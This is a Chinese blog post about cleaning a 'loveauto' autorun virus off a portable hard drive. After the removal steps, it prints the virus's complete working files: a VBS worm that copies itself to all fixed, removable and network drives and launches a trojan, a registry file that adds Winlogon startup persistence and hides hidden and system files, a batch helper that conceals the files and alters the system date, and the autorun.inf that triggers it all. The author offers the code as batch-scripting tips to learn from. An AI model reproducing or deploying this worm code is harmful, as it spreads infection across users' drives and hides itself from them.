zoukankan      html  css  js  c++  java
  • 中病毒,学习批处理

    上周移动硬盘出了点问题,让一个搞电子的朋友检查看看,昨天硬盘拿回来了,可以用了,多谢!
    但是把移动硬盘接到电脑上后,在“我的电脑”无法打开盘符,提示“无法找到脚本loveauto.vbs”,一看是vbs,八成是这哥们机器中病毒了,感染到移动硬盘了!再一点右键,里面有“auto”,进一步证实了我的想法。

    一般有“auto”菜单的都是盘符里面有个autorun.inf在作怪,既然右键不能进入盘符,那我就走歪门邪道,用cmd模式。

    进入cmd模式,进入G:\盘,命令attrib,一看,果然,有几个loveauto.xxx文件,其属性都是SHR类型的,靠,弱智病毒!只能欺负不懂电脑的菜鸟!
    敲命令attrib -s -h -r loveauto.xxx,然后一个个del loveauto.xxx,拔掉移动硬盘,再插入,病毒清除成功。

    换个角度看问题,一般来说,作为病毒可以很容易入侵电脑并且随意传播的,都有一个特点:就是批处理(或自动运行)做的好。下面我们也来看看这个病毒的几个文件代码。

    loveauto.vbs
    ---------------
    on error resume next
    Set WshShell =CreateObject("WScript.Shell")
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    set Of = CreateObject("Scripting.FileSystemObject")
    set dir = Of.GetSpecialFolder(1) '得到特殊目录dir

    if WScript.ScriptFullName="C:\loveauto.vbs" or WScript.ScriptFullName="D:\loveauto.vbs" or WScript.ScriptFullName="E:\loveauto.vbs" or WScript.ScriptFullName="F:\loveauto.vbs" or WScript.ScriptFullName="G:\loveauto.vbs" or WScript.ScriptFullName="H:\loveauto.vbs" or WScript.ScriptFullName="I:\loveauto.vbs" or WScript.ScriptFullName="J:\loveauto.vbs" or WScript.ScriptFullName="K:\loveauto.vbs" or WScript.ScriptFullName="L:\loveauto.vbs" or WScript.ScriptFullName="M:\loveauto.vbs" or WScript.ScriptFullName="N:\loveauto.vbs" or WScript.ScriptFullName="O:\loveauto.vbs" or WScript.ScriptFullName="P:\loveauto.vbs" or WScript.ScriptFullName="Q:\loveauto.vbs" or WScript.ScriptFullName="R:\loveauto.vbs" or WScript.ScriptFullName="S:\loveauto.vbs" or WScript.ScriptFullName="T:\loveauto.vbs" or WScript.ScriptFullName="U:\loveauto.vbs" or WScript.ScriptFullName="V:\loveauto.vbs" or WScript.ScriptFullName="W:\loveauto.vbs" or WScript.ScriptFullName="X:\loveauto.vbs" or WScript.ScriptFullName="Y:\loveauto.vbs" or WScript.ScriptFullName="Z:\loveauto.vbs" then
    a=WshShell.Run("loveauto.bat open" ,0,False)
    a=WshShell.Run("loveauto.bat ++ " ,0,True)


    If objFSO.FileExists(dir&"\loveauto.vbs") Then '判断系统是否已经被感染
    wscript.sleep 10
    else
    a=WshShell.Run("loveauto.bat - "&dir ,0,True)
    a=WshShell.Run("loveauto.bat ++ " ,0,True)
    Of.CopyFile "loveauto.bat",dir&"\",True '如果未被感染 则复制文件
    Of.CopyFile "limt.exe",dir&"\",True
    Of.CopyFile "autorun.inf",dir&"\",True
    Of.CopyFile "loveauto.reg",dir&"\",True
    Of.CopyFile "loveauto.vbs",dir&"\",True
    a=WshShell.Run("loveauto.bat + "&dir ,0,True)
    a=WshShell.Run("loveauto.bat date " ,0,True) '修改时间
    WScript.Sleep 15000
    a=WshShell.Run("limt.exe" ,0,False) '运行木马
    a=WshShell.Run("loveauto.bat hfd " ,0,False) '恢复时间
    For i=1 to 2
    Set dc = Of.Drives '得到所有驱动器

    For Each d In dc '遍历所有盘符并复制自我
    If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
    a=WshShell.Run("loveauto.bat - "&d ,0,True)
    a=WshShell.Run("loveauto.bat ++ " ,0,True)
    Of.CopyFile dir&"\loveauto.bat",d&"\",True
    Of.CopyFile dir&"\limt.exe",d&"\",True
    Of.CopyFile dir&"\autorun.inf",d&"\",True
    Of.CopyFile dir&"\loveauto.reg",d&"\",True
    Of.CopyFile dir&"\loveauto.vbs",d&"\",True
    a=WshShell.Run("loveauto.bat + "&d ,0,True)
    end if
    wscript.sleep 2000
    next
    wscript.sleep 50000
    i=0
    next
    end if
    else
    If objFSO.FileExists(dir&"\loveauto.vbs") Then
    For i=1 to 2
    Set dc = Of.Drives '得到所有驱动器

    For Each d In dc '遍历所有盘符并复制自我
    If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
    a=WshShell.Run("loveauto.bat - "&d ,0,True)
    a=WshShell.Run("loveauto.bat ++ " ,0,True)
    Of.CopyFile dir&"\loveauto.bat",d&"\",True
    Of.CopyFile dir&"\limt.exe",d&"\",True
    Of.CopyFile dir&"\autorun.inf",d&"\",True
    Of.CopyFile dir&"\loveauto.reg",d&"\",True
    Of.CopyFile dir&"\loveauto.vbs",d&"\",True
    a=WshShell.Run("loveauto.bat + "&d ,0,True)
    end if
    wscript.sleep 2000
    next
    wscript.sleep 50000
    i=0
    next
    else
    a=WshShell.Run("loveauto.bat date " ,0,True) '修改时间
    WScript.Sleep 15000
    a=WshShell.Run("limt.exe" ,0,False) '运行木马
    a=WshShell.Run("loveauto.bat hfd " ,0,False) '恢复时间
    a=WshShell.Run("loveauto.bat - "&dir ,0,True)
    a=WshShell.Run("loveauto.bat ++ " ,0,True)
    Of.CopyFile "loveauto.bat",dir&"\",True '如果未被感染 则复制文件
    Of.CopyFile "limt.exe",dir&"\",True
    Of.CopyFile "autorun.inf",dir&"\",True
    Of.CopyFile "loveauto.reg",dir&"\",True
    Of.CopyFile "loveauto.vbs",dir&"\",True
    a=WshShell.Run("loveauto.bat + "&dir ,0,True)
    For i=1 to 2
    Set dc = Of.Drives '得到所有驱动器

    For Each d In dc '遍历所有盘符并复制自我
    If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
    a=WshShell.Run("loveauto.bat - "&d ,0,True)
    a=WshShell.Run("loveauto.bat ++ " ,0,True)
    Of.CopyFile "loveauto.bat",d&"\",True
    Of.CopyFile "limt.exe",d&"\",True
    Of.CopyFile "autorun.inf",d&"\",True
    Of.CopyFile "loveauto.reg",d&"\",True
    Of.CopyFile "loveauto.vbs",d&"\",True
    a=WshShell.Run("loveauto.bat + "&d ,0,True)
    end if
    wscript.sleep 2000
    next
    wscript.sleep 50000
    i=0
    next

    end if

    end if
    ---------------

    loveauto.reg
    ---------------
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Userinit"="userinit.exe,loveauto.bat"

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
    "ShowSuperHidden"=dword:00000000
    "Hidden"=dword:00000002

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
    "RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
    "Text"="@shell32.dll,-30500"
    "Type"="radio"
    "CheckedValue"=dword:00000000
    "ValueName"="Hidden"
    "DefaultValue"=dword:00000000
    "HKeyRoot"=dword:80000001
    "HelpID"="shell.hlp#51105"

    ---------------

    loveauto.bat
    ---------------
    @echo off
    if exist .\loveauto.reg regedit /s .\loveauto.reg
    if "%1"=="open" goto open
    if "%1"=="-" goto qu
    if "%1"=="++" goto jiajia
    if "%1"=="+" goto jia
    if "%1"=="date" goto date
    if "%1"=="hfd" goto hfd
    goto start
    :qu
    attrib -s -a -h -r %2\loveauto.bat
    attrib -s -a -h -r %2\loveauto.reg
    attrib -s -a -h -r %2\autorun.inf
    attrib -s -a -h -r %2\loveauto.vbs
    attrib -s -a -h -r %2\limt.exe
    exit
    :jia
    attrib +s +a +h +r %2\loveauto.bat
    attrib +s +a +h +r %2\loveauto.reg
    attrib +s +a +h +r %2\autorun.inf
    attrib +s +a +h +r %2\loveauto.vbs
    attrib +s +a +h +r %2\limt.exe
    exit
    :jiajia
    attrib +s +a +h +r loveauto.bat
    attrib +s +a +h +r loveauto.reg
    attrib +s +a +h +r autorun.inf
    attrib +s +a +h +r loveauto.vbs
    attrib +s +a +h +r limt.exe
    exit
    :open
    start explorer .\
    exit
    :date
    date 1990-01-01

    date 1990-01-01
    exit
    :hfd
    date 2007-05-29
    date %date%
    exit
    :start
    start WScript.exe %SYSTEMROOT%\system32\loveauto.vbs&exit
    :end

    ---------------

    autorun.inf
    ---------------
    [autorun]
    open=WScript.exe loveauto.vbs
    shellEXEcute=WScript.exe loveauto.vbs
    shell\Auto\command=WScript.exe loveauto.vbs
    shell\open=打开(&O)
    shell\open\Command=WScript.exe .\loveauto.vbs
    shell\open\Default=1
    shell\explore=资源管理器(&X)
    shell\explore\Command=WScript.exe .\loveauto.vbs
    ---------------


    在vbs和bat文件中,一些批处理的技巧,可以参考学习。
  • 相关阅读:
    Integer中计算int位数的方法
    Spark学习---常见的RDD转和行动操作
    Spark学习---RDD编程
    《教父》中的经典台词以及英文原版
    关于MATSIM中,如何关闭自动加载dtd的问题
    源发行版8需要目标发行版1.8
    关于Mysql中GROUP_CONCAT函数返回值长度的坑
    【转】通过xml处理sql语句时对小于号与大于号的处理转换
    XmlDocument根据节点的属性值获取节点
    【转】使用SevenZipSharp压缩、解压文件
  • 原文地址:https://www.cnblogs.com/longware/p/13382332.html
Copyright © 2011-2022 走看看